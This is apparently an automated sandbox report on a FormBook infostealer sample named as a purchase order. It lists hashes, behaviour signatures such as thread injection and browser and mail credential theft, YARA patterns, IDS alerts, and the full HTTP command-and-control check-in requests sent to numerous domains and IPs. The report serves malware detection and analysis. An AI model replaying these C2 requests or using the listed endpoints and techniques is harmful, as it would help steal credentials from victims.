
Windows Analysis Report
PO 09110124 EXPRESS SYSTEM-SESB24066.exe

Overview

General Information

Sample name: PO 09110124 EXPRESS SYSTEM-SESB24066.exe
Analysis ID: 1508450
MD5: c029364519d917e71ec6e8be9301755b
SHA1: edbf0638c76e9ab5d26f84d98c94b23757685da1
SHA256: ecde745484cbfc4aa7ff0de292907acd4bab3b772641f09815030a2d0887073f
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO 09110124 EXPRESS SYSTEM-SESB24066.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe" MD5: C029364519D917E71EC6E8BE9301755B)
    • svchost.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ZQphKCYQofBW.exe (PID: 3872 cmdline: "C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 7372 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)
          • ZQphKCYQofBW.exe (PID: 1880 cmdline: "C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7704 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Memory dumps (5 of 11 entries shown):

Source | Rule | Description | Author
00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bdd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13fcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Unpacked PEs:

Source | Rule | Description | Author
1.2.svchost.exe.350000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.350000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.350000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.350000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e773:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16972:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", CommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", CommandLine|base64offset|contains: u], Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", ParentImage: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ParentProcessId: 7280, ParentProcessName: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", ProcessId: 7304, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", CommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", CommandLine|base64offset|contains: u], Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", ParentImage: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ParentProcessId: 7280, ParentProcessName: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe", ProcessId: 7304, ProcessName: svchost.exe

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-10T08:48:13.436745+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 47.57.185.227 | 80 | TCP
2024-09-10T08:48:37.031525+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 89.58.49.1 | 80 | TCP
2024-09-10T08:48:59.099041+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 154.23.184.240 | 80 | TCP
2024-09-10T08:49:12.745705+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 85.159.66.93 | 80 | TCP
2024-09-10T08:49:26.732425+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 185.173.111.76 | 80 | TCP
2024-09-10T08:49:40.352802+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 203.161.43.228 | 80 | TCP
2024-09-10T08:49:53.716519+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 161.97.168.245 | 80 | TCP
2024-09-10T08:50:11.450675+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49765 | 172.96.191.39 | 80 | TCP
2024-09-10T08:50:24.780304+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49769 | 104.21.20.125 | 80 | TCP
2024-09-10T08:50:38.980037+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49773 | 43.242.202.169 | 80 | TCP


AV Detection

Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Avira: detected
Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe; ReversingLabs: Detection: 26%
Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Virustotal: Detection: 33%
Source: Yara match; File source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Joe Sandbox ML: detected
Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb; source: ZQphKCYQofBW.exe, 00000002.00000002.3540260087.00000000004EE000.00000002.00000001.01000000.00000004.sdmp, ZQphKCYQofBW.exe, 00000007.00000000.1945115829.00000000004EE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: rmactivate_ssp.pdb; source: svchost.exe, 00000001.00000003.1844218176.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844152538.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3540722750.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3548168948.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP; source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696142681.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1699178935.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1784461841.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1786172496.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1882981823.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1881083378.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.000000000309E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696142681.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1699178935.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1877718098.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1784461841.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1786172496.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1882981823.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1881083378.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3541848537.000000000309E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb; source: RMActivate_ssp.exe, 00000003.00000002.3543103481.000000000352C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2214560535.0000000001D5C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP; source: RMActivate_ssp.exe, 00000003.00000002.3543103481.000000000352C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000007.00000002.3542289624.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2214560535.0000000001D5C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: rmactivate_ssp.pdbGCTL; source: svchost.exe, 00000001.00000003.1844218176.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1844152538.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3540722750.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ZQphKCYQofBW.exe, 00000002.00000002.3548168948.00000000055D0000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_002CDD92 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_00302044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_0030219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_003024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_002F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_002F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_002FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_002FFD47 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_002FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 3_2_025AC380 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4x nop then xor eax, eax; 3_2_02599B30
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Code function: 4x nop then mov ebx, 00000004h; 3_2_02D904E7

Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 89.58.49.1:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 154.23.184.240:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 185.173.111.76:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 47.57.185.227:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 104.21.20.125:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 172.96.191.39:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 161.97.168.245:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 43.242.202.169:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 203.161.43.228:80
Source: DNS query: www.golbasi-nakliyat.xyz
Source: DNS query: www.kckartal.xyz
Source: Joe Sandbox View; IP Address: 203.161.43.228
Source: Joe Sandbox View; IP Address: 172.96.191.39
Source: Joe Sandbox View; ASN Name: VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View; ASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 occurrences)
Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe; Code function: 0_2_0030550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic; HTTP traffic detected:
  GET /w9nd/?chHT=9dRK0h7YIJsGSRnhz7V9NsNj7P/k9yHBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtqUckbqGSyTGH7gwVeueowUmtWPR1ijKwEtw=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.726075.buzz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
  GET /xcfw/?chHT=bjW1F6zberoR1D3Y/XEIKVRbrrv+ro5pHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFAwVPxBpt2RsyemRiOMSAY7rdemSMqYxcM/3o=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.freepicture.online
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
  GET /p39s/?chHT=1N9NMDNpm9Czos0vDuAaxfkyacdu5dmrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV81dYi+UjaGlO+WfnitkWEaBCkm6SMdBoGO9M=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.hm62t.top
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
  GET /k2vl/?chHT=TxupyKnRMohPPcJUOXYiFfym6FYb3U4dGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bNPEHR5AP8gY607qfZYhRyRQHcihpFxABXgI=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.golbasi-nakliyat.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
  GET /lwt6/?chHT=j/d5AuZ+qvKLIrA4zRH7iumC4FPYuWAbkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZRBEg4xmoLeM9ymATeeiPAi1OIEjfa/hQNNA=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.mfgamecompany.shop
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
  GET /ftr3/?chHT=7ghTfXuNFdv7bt0cfac8sWAvvgA+iGAttJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+mp46J/Wf0OAVor6kOMcVXs+ErAF0mdrKXqQ=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.quilo.life
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
  GET /wjff/?chHT=4KVKOjLTUXvpTd2tw7YgFu7M88ozG6iAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCYIQBHe5WIuBUoW+30QfUJAtM0OLXkJ34ecY=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.qiluqiyuan.buzz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
  GET /3lkx/?chHT=RihUS+ZcBcWtP49cUqKa3/5xmWqGYNk0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4ueBHr6qafW/u83WMg9sFtSHOnpje/7KsHpWM=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.bola88site.one
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
  GET /h5qr/?chHT=/bmdZ0vLXnogocV0iYIh9qPv22C1+ePhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5evw/1eyPyHW7+NkDn/WIzzX8wvew4kJYzT8Us=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.kckartal.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
  GET /ed2j/?chHT=HnYP2yoU4dt40olvIDuXD48kL/PNXzgkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjaKCOmMM/uBzrxUijYkdqZPZsj8JBjY2qkwg=&bd=rj1X_pBPLTnXd0 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en
  Host: www.mizuquan.top
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic; DNS traffic detected: DNS query: www.monos.shop
Source: global traffic; DNS traffic detected: DNS query: www.726075.buzz
Source: global traffic; DNS traffic detected: DNS query: www.freepicture.online
Source: global traffic; DNS traffic detected: DNS query: www.318st.com
Source: global traffic; DNS traffic detected: DNS query: www.hm62t.top
Source: global traffic; DNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
Source: global traffic; DNS traffic detected: DNS query: www.mfgamecompany.shop
Source: global traffic; DNS traffic detected: DNS query: www.quilo.life
Source: global traffic; DNS traffic detected: DNS query: www.qiluqiyuan.buzz
Source: global traffic; DNS traffic detected: DNS query: www.bola88site.one
Source: global traffic; DNS traffic detected: DNS query: www.kckartal.xyz
Source: global traffic; DNS traffic detected: DNS query: www.mizuquan.top
Source: global traffic; DNS traffic detected: DNS query: www.kxshopmr.store
Source: unknown; HTTP traffic detected:
  POST /xcfw/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en
  Host: www.freepicture.online
  Origin: http://www.freepicture.online
  Referer: http://www.freepicture.online/xcfw/
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Content-Length: 201
  Cache-Control: max-age=0
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
